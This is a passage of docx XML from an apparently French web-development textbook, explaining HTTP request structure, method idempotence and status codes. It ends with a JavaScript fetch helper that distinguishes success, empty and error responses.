          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une requête HTTP se compose d'une méthode, d'une URL, d'en-têtes et parfois d'un corps. Chaque partie a un rôle précis et une API mal documentée se comprend en observant ces éléments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une requête complète, ligne par ligne · http</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POST /api/articles HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: exemple.fr</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:t>Accept: application/json</w:t>
        <w:br/>
        <w:t>Authorization: Bearer eyJhbGciOi...</w:t>
        <w:br/>
        <w:br/>
        <w:t>{"titre": "CSS Grid", "publie": true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.92 — Cinq méthodes et leurs conventions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188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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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188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Corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="228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Idempotente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GET</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Lire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>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2287"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="188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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>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Créer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="188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228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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PUT</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Remplacer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>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2287"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="188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PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>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Modifier partiellement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="188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228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Selon l'implémentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DELETE</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Supprimer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1884"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parfois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2287"/>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IDEMPOTENTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Se dit d'une opération dont la répétition produit le même effet que l'exécution unique. Rejouer un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est sans danger ; rejouer un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> peut créer un doublon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>30.2 Lire et interpréter les codes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le code de statut est le premier signal. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>2xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique un succès, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une erreur de la requête, un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une erreur du serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.93 — Douze codes et la réaction attendue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13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Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Réaction attendue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Succès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lire le corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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201</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Créé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Lire l'en-tête </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>204</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Succès sans contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ne pas lire le corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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301 / 308</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Déplacé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="351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fetch</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> suit automatiquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requête invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corriger l'envoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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401</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Non authentifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Redemander une connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interdit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ne pas réessayer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Introuvable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Afficher un état vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>409</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conflit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fusionner ou prévenir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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422</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Validation échouée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Afficher les erreurs par champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2139"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>429</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trop de requêtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>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Attendre, respecter </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Retry-After</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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500 / 503</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Erreur serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Réessayer avec prudence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une fonction d'appel qui distingue les cas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async function appeler(url, options = {}) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reponse = await fetch(url, options);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  if (reponse.status === 204) return null;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const type = reponse.headers.get("content-type") || "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const estJson = type.includes("application/json");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const corps = estJson ? await reponse.json() : await reponse.text();</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  if (!reponse.ok) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const erreur = new Error(corps?.message || `HTTP ${reponse.status}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    erreur.status = reponse.status;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    erreur.corps = corps;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw erreur;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  return corps;</w:t>
